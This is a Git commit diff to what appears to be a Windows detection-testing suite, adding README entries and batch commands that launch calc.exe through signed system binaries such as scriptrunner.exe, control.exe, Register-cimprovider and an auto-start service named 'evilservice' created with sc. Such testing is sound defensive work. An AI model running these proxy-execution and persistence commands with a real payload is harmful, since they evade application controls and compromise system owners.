tests added

plusplusxu · Jul 16, 2018 · 9f9bf4c · 9f9bf4c
1 parent 60ce49b
commit 9f9bf4c
Show file tree

Hide file tree

Showing 2 changed files with 27 additions and 6 deletions.
diff --git a/README.md b/README.md
@@ -37,10 +37,10 @@ The script executes only calc.exe through numerous methods. You can replace this
 | T1128  | Shdocvw |
 | T1085  | csc.exe |
 | T1130  | advpack.dll |
-| T1191  | 
-| T1202  |
-| T1028  |
-| T1053  |
+| T1191  | Scriptrunner |
+| T1202  | sc |
+| T1028  | Register-cimprovider |
+| T1053  | control.exe |
 | T1216  |
 | T1218  |
 | T1033  | 

diff --git a/runtests.bat b/runtests.bat
@@ -394,12 +394,33 @@ echo Command Excuted: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /o
 echo Command Excuted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe /out:payload.exe payload.cs
 echo Command Excuted: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe /out:payload.exe payload.cs
 echo Command Excuted: payload.exe 
-
+sleep 3
 echo %time% %date% [+] Testing advpack exec
 start "" cmd /c rundll32.exe advpack.dll,RegisterOCX calc.exe
 echo Execution Finished at %time% %date%
 echo Command Excuted: rundll32.exe advpack.dll,RegisterOCX calc.exe
-
+sleep 3
+echo %time% %date% [+] Testing Scriptrunner exec
+start "" cmd /c scriptrunner.exe -appvscript calc.exe   
+echo Execution Finished at %time% %date%
+echo Command Excuted: scriptrunner.exe -appvscript calc.exe
+sleep 3
+echo %time% %date% [+] Testing SC exec
+start "" cmd /c sc create evilservice binPath= "C:\windows\system32\cmd.exe /c calc.exe" DisplayName= "evilservice" start= auto     
+start "" cmd /c sc start evilservice     
+echo Execution Finished at %time% %date%
+echo Command Excuted: sc create evilservice binPath= "C:\windows\system32\cmd.exe /c calc.exe" DisplayName= "evilservice" start= auto  
+echo Command Excuted: sc start evilservice
+sleep 3
+echo %time% %date% [+] Testing Register-cimprovider exec
+start "" cmd /c Register-cimprovider -path "AllTheThings.dll"   
+echo Execution Finished at %time% %date%
+echo Command Excuted: Register-cimprovider -path "AllTheThings.dll"   
+sleep 3
+echo %time% %date% [+] Testing control.exe exec
+start "" cmd /c control.exe AllTheThings.dll
+echo Execution Finished at %time% %date%
+echo Command Excuted: control.exe AllTheThings.dll
 
 echo [+] Let tasks finish before killing all the files